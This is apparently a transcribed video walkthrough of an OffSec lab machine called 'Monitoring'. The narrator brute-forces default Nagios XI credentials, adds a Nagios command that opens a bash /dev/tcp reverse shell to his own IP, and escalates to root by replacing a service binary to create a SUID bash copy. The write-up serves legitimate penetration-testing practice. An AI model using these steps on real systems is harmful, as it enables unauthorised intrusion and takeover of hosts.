Hey there, I'm Trustverity and today we are going to focus primarily on OffSec website. They actually offer virtual machines which are vulnerable to hack. So basically I'll be taking you step by step the way I do it. So normally what I do, I actually like set a timer for myself to see how fast I can actually solve a vulnerable machine or rather hack into it and get root. So without further ado, I'll just jump into it. So this is OffSec website. You can just like create an account and after you create an account, you get into this dashboard. So you have access to like this stuff, but then you cannot actually get into it simply because you won't be having a voucher, or rather you'll be forced to buy it. So look at this, not included in your current subscription. Okay, so basically for me, I had a subscription a year ago, and I was able to like do like pen 103. So this is the KLCP exam, that is Kali Linux Certified Professional, and I passed. I also did pen 210. So this is not the main focus of the video, and of course I did pass this one as well. So the main focus of video is that you'll click the explore and come to labs and then click play. So these are the ones that are actually free to play, so you don't need a voucher to play these ones. So you can come to warm up. So for warm up, these are like the easier ones, and I was actually looking at a box called monitoring. So it's an interesting one. Let's see, monitoring. Yeah, so this is the box. It's an interesting one. So you can just click on start there, and then it will be like preparing. So let's just cancel this and then launch our VPN, because again we don't want to use the attack box. We already have our own attack box, right? So the way we launch the VPN is just like we write sudo open VPN config and then the box, and then we give it the password of our user. So you'll see like a new IP here, so that will be our turn 0. It's a new tunnel created. So the tunnel will be created, and we'll be able to actually primarily access the environment of OffSec. So again here I'll get our clock. So let's get our clock running, and we'll actually say we are working on monitoring box from OffSec, right? And then we'll just click start. Again, let's come back here and try to launch it. So stop the instance, yes. So this is gonna take like 2 minutes so that we start it again. I believe you can't like stop and start the instance like without giving it like oh, okay, it accepts. Let's get this one there. Let's stop the attack machine. Yes, and then let's get this IP. Pretty much it. So let's try pinging it. Yeah, probably not the best idea, but so can we stop that curly box? Oh, just stop the box. Okay. Can we now start it? Okay, let's give it a minute. We copy the IP address again, and then we try seeing if we can ping it, and successfully we can ping it. So let's go to nmap directory, and then we just do nmap tag sc tag sv, and then the IP address, tag on to save it to nmap underscore output file, then tag vv. So we need one a one tag. So And just from like using the tag verbose mode, you can actually realize that we have about 80 running. So I'll just go to that. And one thing you realize is that you have an Nagios XI site. So this is a monitoring tool, I think. So let's just Google that. So we are chasing against time XI tool. Let's see. We have already spent 2 minutes. Okay. So they are saying it's a monitor all mission critical infrastructure components. Okay. So basically this will be like a SIM thing. Not sure. It's like an endpoint monitoring tool for your devices, the logs that are coming in. I'm pretty sure they must have like port UDP open, the 161, 169 one for network monitoring, right? But anyway, so we'll focus on that if we don't find anything on the web. So normally they are like these guys normally has like default credentials. So I'll just so Nagios, sorry for the typo, Nagios XI default credentials, right? So let's try them. And from here you can see we have a root account with Nagios XI. So root Nagios XI. Let's see if that works. And that fails. So I'll just note them down. Come here to OffSec, play monitoring, and then we just go to tab, and then we'll vim passwords, possible combinations, right? So what will we do? We'll actually write it as a word list, and then we have root Nagios XI. Again we have default password for that. Let's see. So yeah, default is this one, we also have Nagios admin, right? So let's try that. Nagios admin. Yeah, that fails too. So I'll also add Nagios admin here, and just out of curiosity I'll just add admin, right? Admin. That fails too. Yeah, that fails too. So let's add admin there. Let's go back, check. So you see there's like admin there. Nagios admin, we tried that already. Okay, so I think I'll just brute force with what we have, like basically the word list that we have just made, because I don't see any other default credential that we can actually use. So yeah, pretty much it. So let's come here, and then we'll just launch the developer tools, and then on network I'll just just go on the network tab, get this a little bit lower there, just write admin and click login. So yeah, we'll get this and copy it as card. Come on, and then we just save this guy here. Play machines, monitoring, and then we'll just sublime text a.py. Okay, so console, and then let's see. So call this post So these are basically the headers. Okay, so what we'll actually do is get this guy rolling with. So normally I just change this curl into a Python script, and the way I do that is so we'll come here to curl-converter.com, and then I'll just paste my curl command, and I'll get my Python script here. So let's get rid of it, and then we have a nice curl request here. So one thing I want to do is just say word list equals to, and then I'll create like a for equals to, and then I'll just do a for loop. So x for x in open, and then so I'll just do like word list again, and then the mode will be like read. Okay, because we don't have like to read it in bytes. Normally when it's roq.txt, I have to read it in bytes. So what I'll do is just copy this and then comment it out, and then I just say for I in word list print I. Okay, so let's see, python 3 a.py, and for I in okay, awesome. So I think we do have it correctly, so I just do maybe x.decode. I don't think we need actually x.decode because again let's see, because again this will just be written in ASCII, right? So what we do need actually is just to do a for I in our word list here, and then we'll just tab these guys here like that. And also we need like a for x in word list. So simply because we'll be brute forcing each password as a username. So for each password, we'll try it as a username and try all the other possibilities as passwords, right? And then go to the next one. So pretty much it. And then here I'll just do an I, and then we need to do it in format string. And then here I'll just do an X, and then I'll just do it in format string. Actually, let's just do a J like that, and then this one will be an R. So let's do print r.txt, r.text, get rid of it, and then I just cancel because I know most of the first things will fail, so I need to see the error that I'll put in my for loop. Okay, so invalid username password, so we just need to get this guy here, then come back here and we'll just give an if statement here. So if this guy is in r.txt, then you need to print what? You need to print password. So is it failed password combination, and then we'll just give it like an I and then a J, right? And then so okay, and then we'll just do a control C, control V, and then we'll just say correct. And then maybe we can try okay, that will be fine. I think that will work. So okay, so basically we don't need an S here, so that was just for remembrance purposes. And you can see, oh okay, combination root. Okay, so there must be a problem here. We are reading the, what do we call it, we are reading the so okay, we should just do like dot strip here. We shouldn't read the new we shouldn't read the new line, so we should just do like that. Yeah, like that, like that. looks like it's actually working, and we have a correct combination. Awesome. So we have Nagios admin. Okay, we don't need that to continue. So our script has served its purpose, and so so our script has served its purpose, and now we can try to log into here using Nagios admin and then admin. So let's see, we have spent 17, so I bet in 30 minutes will be done, right? So again, you can see here a configure something. So let's see what we are configuring actually. Might be very interesting, and out of the bat I can actually see commands here. So let's see, for instance, ping, and you can see you can check ping, we can run the command, and let's run it. Okay, so this is actually being executed in Nagios at Ubuntu. Ubuntu is the host name, Nagios is the username. So that's really interesting. So you just close that and go to commands. I bet we have a way of adding commands, right? Again, that's the whole thing, that's the whole idea behind being an administrator in a site, right? So we can like add a new one, and then I want this to be called trusty, and I want this to be a bash command. So bash taxi, then bash tac I, and then we do this, and then dev tcp, then what, 168.45.227. Then we'll just do port 1337, then like that. So I want to see if this will work. So I'll just come back here and say netcat 1. So that this just do like netcat and lvp 1337. Okay, and then let's see. Okay, that works. So you can see if it's a check command, I guess, and then save it. And so this will call out for like a configuration kind of thing, not sure. Let's see how this works out. So it says changes have been detected, and we should like apply configuration for new changes to take effect. Okay, so can we apply the configuration now? And then I'll just set a listener here. Okay, apply configuration again. So on configure, I'll just go to config dashboard, core config dashboard again. And maybe we can actually duplicate this tab. And so let's see. Yeah, so think we're on the right path. So can we like click on commands? Maybe ping. Can we click on ping command? And then just check whether, okay, looks like it's actually responding really well. So let's click on ping here, see if we can run it. Okay, that is taking a minute. So I'll just go to trusty, and we actually do have the command here, and then I'll just run the command, and we get a shell. So pretty much it. And then just to stabilize the shell, I'll do python 3 taxi import pty, and then pty.spawn, and then the program we want to actually run is bin bash. Like that, and then we'll just say export term equals to xterm, and then we'll control Z, and then we'll just say echo stty. Okay, so echo stty dash row, I guess. I keep forgetting that, so I just say stable shell, then copy it here, and so it is actually stty row dash echo, and then foreground it and reset the terminal like that, and then stty rows, we need 26 of them, and columns we need 105. 105. Okay, so that's awesome. So let's just do who am I real quick, and then ID. I don't have any weird group, so I just go ahead to check sudo takel. What I can run is root, and I can actually see that we can run manage services. So manage services is actually it's actually interesting. So we see that we can provide a parameter. So I'll provide a parameter stop. Let's see, and we can see that we have these guys here. So we can actually stop any of these services, right? So I'll just go to user. I want to just check if these services we can actually maybe relight one of it or something of sort. So user, and then local. I'll just redo my stuff. So Python 3 taxi import pty.spawn, and then we want bin bash like that, and then we want to export term equals to extra, and then we want to do this. So again, we wanted to go to this location here, check what is installed locally. So just do that. Again, the box hangs. This is really interesting. Okay, so let's list, and we can actually see we have a Nagios directory. So if we go to Nagios and list, so cd Nagios and list, we actually see that we have a binary directory, which is really interesting. So if you go there and list, you'll actually see the binaries that we can actually access here, like the ones that we can stop, they're actually in this /bin directory. So that raises a really nice question. What are the permissions? So that's what we'll be actually checking on. I don't know why the box keeps hanging for some weird reasons. So again, I'll just pause the video and okay. So turns out it's bugs, and we can actually see so can we see d/bin there and the list? So okay, we'll just launch another terminal and kill all these connections. So where are they? Come on, we have one here. So we'll just kill Tuck9, this guy here, and Let's see if we can actually get another connection. So yeah, we have another connection again. So just do, sorry for that. Um, and so we'll see the user local nagios and then /bin, and then we can list now, and we can actually see that the binaries we can actually do start or this operations on, they're actually located here, so we can actually check on the permissions. Yeah, don't tell me that you actually have hanged again, because again that will be shitty. So let's see. Don't tell me I just lost the connection. Okay, awesome. So again, we can see that we own Nagios here and we also own NCPD. So what we can actually do is just remove tag NCPD, and then now we can actually do nano NCPD, and then what we'll do actually just provide uh, we just provide a shebang to say that this will be a script, and then do like cp bin bash to temporarily directory, and then name it X. From there we need to do chmod user plus suite binaries on temporarily that binary. So let's see. Let's now save it. Uh, Give it executable bits plus X on ncpd. Okay, it's taking a minute. I'm typing, but this thing here it's not doing it. It's not taking effect. So let's see. Looks like it has hanged again. So let's give it a minute. So okay, this looks like it has actually worked. So I'll just copy this and do stop ncpd. Okay, so this hanged, and now I think we can actually access this guy here. Okay, this is also working, so I'll just try checking if we actually did set the contents of this file correctly, and we can see they are actually correct. And then I'll just do ncpd, and we see that we have executable rights for it. So I'll just do the manage services script here. Just do sudo that, and then stop ncpd like that. Okay, so second parameter must be this one. So okay, so this guy here should be npcd. So what we'll do actually is that we will move this to this person here, npcd. Okay, so can we cd there? list, and you can see have npcd and ncpd. So the right one should actually be this one, npcd. So just remove tag rf, this guy here, npcd, and then I'll try to move ncpd to this guy here, Okay, it has hanged also, so let's see. Move this to this guy, npcd. Okay, so having done that, now we can actually do this stop, and then this person here, and then now we can actually start it. Okay, so let's list in everything in temporary directory, and we have an X. So let's cd there, and we can actually do X and then tag P to get a root shell like that, and then we can actually go to /root. Yeah, these have hanged again, so let's give it a minute and see. So yeah, it has hung, but you get the idea. So X tag P like that. Okay, is really taking its time, but yeah, you get the idea. We are root, as you can see here. So if you cd to /root, you can actually get the proof.txt like that. Awesome. So that's the end of the box. I guess we have spent like around 40 something minutes, but as you know, we had like issues with VPN. I'll see you for the next box. Thank you for chilling around with me up to the end.